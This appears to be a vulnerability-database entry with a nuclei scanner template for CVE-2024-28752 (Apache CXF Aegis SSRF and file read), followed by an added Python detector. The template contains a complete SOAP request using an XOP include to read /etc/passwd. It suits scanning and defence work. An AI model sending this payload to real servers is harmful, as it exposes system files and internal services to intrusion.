Apache CXF < 4.0.4 - Aegis DataBinding SSRF / Local File Read

Reported by ProjectDiscovery, 02 Jul 2026 09:36:57. Type: nuclei. Source: github.com

Apache CXF before 4.0.4 allows SSRF and local file read via Aegis DataBinding.

Code
id: CVE-2024-28752

info:
  name: Apache CXF < 4.0.4 - Aegis DataBinding SSRF / Local File Read
  author: maciejklimek
  severity: high
  description: |
    Apache CXF before 4.0.4, 3.6.3 and 3.5.8 has a Server-Side Request Forgery (SSRF) vulnerability when using the Aegis DataBinding. The XOP Include mechanism in multipart SOAP requests can be abused to read local files or make server-side HTTP requests to arbitrary URLs. An attacker can use this to access sensitive internal resources.
  impact: |
    An attacker can read arbitrary files from the server and make server-side requests to internal services.
  remediation: Upgrade Apache CXF to version 4.0.4, 3.6.3, or 3.5.8 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-28752
    - https://github.com/advisories/GHSA-qmgx-j96g-4428
    - https://github.com/ReaJason/CVE-2024-28752
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-28752
    epss-score: 0.05849
    epss-percentile: 0.92274
    cwe-id: CWE-918
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.component:"Apache CXF"
    fofa-query: body="Apache CXF"
  tags: cve,cve2024,apache,cxf,ssrf,lfi

http:
  - raw:
      - |
        POST /test HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/related; boundary=----nucleibound

        ------nucleibound
        Content-Disposition: form-data; name="1"

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://service.namespace/">
           <soapenv:Header/>
           <soapenv:Body>
              <web:test>
                 <arg0>
        <count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///etc/passwd"></xop:Include></count>
        </arg0>
              </web:test>
           </soapenv:Body>
        </soapenv:Envelope>
        ------nucleibound--

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Unmarshalling Error"

      - type: regex
        part: body
        regex:
          - "cm9vd[A-Za-z0-9+/=]+"

      - type: word
        part: content_type
        words:
          - "text/xml"
# digest: 4b0a00483046022100ffa948ae8559021a66723c524dfbeb519e0f344f9e603736730711f6c58769e6022100b2910f126094f12684757da990b49d30fb1538a7584d31e7c3dad8bdfe06b36a:922c64590222798bb761d5b6d8e72950
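As an added example, not part of the Vulners record or the ProjectDiscovery template, here is a small Python detector built around the same indicators the template's matchers use: it flags xop:Include references in a multipart SOAP request whose href is not a cid: URI (the only reference form XOP defines), and it decodes the base64 blob that the template's "cm9vd" regex looks for in an "Unmarshalling Error" response. The request and response samples are constructed here; the XOP namespace and the regex come from the template above.

```python
import base64
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

XOP_NS = "http://www.w3.org/2004/08/xop/include"   # namespace used in the template
LEAK_RE = re.compile(r"cm9vd[A-Za-z0-9+/=]+")      # the template's regex matcher

# Constructed sample request in the template's shape: a file: XOP reference (the indicator) next to a legitimate cid: one.
SAMPLE_REQUEST = (
    b'------nucleibound\r\nContent-Disposition: form-data; name="1"\r\n\r\n'
    b'<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
    b'<soapenv:Body><test xmlns="http://service.namespace/"><arg0>'
    b'<count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///etc/passwd"/></count>'
    b'<blob><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="cid:part1@example.org"/></blob>'
    b'</arg0></test></soapenv:Body></soapenv:Envelope>\r\n------nucleibound--\r\n'
)
# Constructed sample response: the error text plus a base64 blob, the shape the two body matchers expect.
SAMPLE_RESPONSE = "Unmarshalling Error: " + base64.b64encode(b"root:x:0:0:root:/root:/bin/bash\n").decode()

def mime_part_bodies(raw: bytes, boundary: str) -> list[bytes]:
    """Split a multipart/related body on its boundary; return each part without its headers."""
    bodies = []
    for chunk in raw.replace(b"\r\n", b"\n").split(b"--" + boundary.encode()):
        chunk = chunk.strip()
        if chunk and chunk != b"--":             # skip the preamble and the closing delimiter
            bodies.append(chunk.partition(b"\n\n")[2])
    return bodies

def non_cid_xop_hrefs(xml_part: bytes) -> list[str]:
    """hrefs of xop:Include elements whose scheme is not cid: (file:/http: is the CVE-2024-28752 pattern)."""
    try:
        root = ET.fromstring(xml_part)
    except ET.ParseError:
        return []                                # not XML: nothing to flag in this part
    hrefs = [inc.get("href", "") for inc in root.iter(f"{{{XOP_NS}}}Include")]
    return [h for h in hrefs if urlsplit(h).scheme.lower() != "cid"]

def scan_request(raw: bytes, boundary: str) -> list[str]:
    """All suspicious XOP hrefs across every MIME part of one request."""
    return [h for body in mime_part_bodies(raw, boundary) for h in non_cid_xop_hrefs(body)]

def decode_leaked_blobs(response_body: str) -> list[str]:
    """Decode base64 blobs starting 'cm9vd' (any base64 of bytes beginning 'root'), as the template's regex detects."""
    out = []
    for m in LEAK_RE.finditer(response_body):
        try:
            out.append(base64.b64decode(m.group(0), validate=True).decode("utf-8", "replace"))
        except ValueError:                       # binascii.Error is a ValueError subclass
            pass
    return out
```

The request-side check is the part worth putting in front of an unpatched endpoint (WAF rule or reverse-proxy filter); the response-side decoder is for confirming, from captured traffic or logs, whether a matched probe actually returned file content.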


Vulners scores (current as of 31 Mar 2026 15:55): Vulners AI Score 7 (High risk); CVSS 3.1 9.3; EPSS 0.05849; SSVC 10